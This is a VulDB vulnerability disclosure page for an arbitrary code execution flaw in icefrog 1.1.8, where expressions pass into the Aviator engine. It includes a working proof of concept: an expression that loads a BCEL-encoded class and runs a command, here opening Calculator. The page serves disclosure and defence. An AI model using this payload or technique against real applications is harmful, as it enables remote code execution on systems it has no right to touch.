Submit #169999: icefrog v1.1.8 Has an Execute Arbitrary Code vulnerability (info)

Title: icefrog v1.1.8 Has an Execute Arbitrary Code vulnerability
Description: IceFrog is a suite of core and expanded libraries that include utility classes, collections, I/O classes, and much more, a tool like Guava, Apache Commons, and Hutool. In icefrog 1.1.8, the reference enters the aviator engine to parse the expression, and the aviator expression can directly enter the new object, but it is not allowed to call non-public static methods. You can use BCELClassloader to load BCEL code to accomplish RCE. When a user uses icefrog to parse an expression, the aviator template engine is triggered, leading to an arbitrary code execution vulnerability. The test code is here:

import com.whaleal.icefrog.extra.expression.ExpressionUtil;

String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$5dP$cbJ$c3$40$U$3d$d3$a6M$8d$d1$b6$d6$fa$CAW$a6$5d$98$8d$bb$88$hQ$Q$8a$V$x$ee$93x$JS$f2$uy$94$7c$96nT$5c$f8$B$7e$94x$tJ$5b$i$98s$ef$3d$9c$3b$e70_$df$l$9f$A$cep$60$a0$81$8e$81$$$b6$U$f4tl$eb$e8$L4$cfe$y$f3$L$81$ba5x$U$d0$$$93$t$Sh$8fdL$b7E$e4Q$fa$e0z$n3$g$95$e4$L$9cX$a3$a9$3bw$ed$d0$8d$D$7b$92$a72$O$9c$c1$Ku$97$s$3ee$99$p$60$5c$95$3e$cdr$99$c4$99$8e$j$9e$tI$91$fat$z$d5kk4$97$e1$a9Z3$d1$84$aec$d7$c4$k$f6M$YX$X$e8$qi$60S$e9F$b3$90l$a5dji1$f6$a6$e4$e7$C$bd$8a$92$89$7d3$5eX$Jt$97$c2$fb$o$cee$c4nF$40$f9b$e8$5b$aby$ffh$H$c7$d0$f8$83$d4$a9A$a8L$8c$z$9e$O$b9$K$ae$8d$e1$h$c4$L7$i$9e$b1$f9Kr$cf$89yEI$8f$aaU$a0$f5$8e$da$f0$V$f5$e7$7fj$j$s$a3$c6$fd$G$df$cd$ca$aa$fd$D$fe$90$a41$a1$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );";
final Object eval = ExpressionUtil.eval(exp, null);
Source: https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md
User: dreamfly (UID 37785)
Submission: 2023-06-15 08:58 (3 years ago)
Moderation: 2023-06-18 09:49 (3 days later)
Status: Accepted
VulDB Entry: 231804 [whaleal IceFrog 1.1.8 Aviator Template Engine privilege escalation]
Points: 20
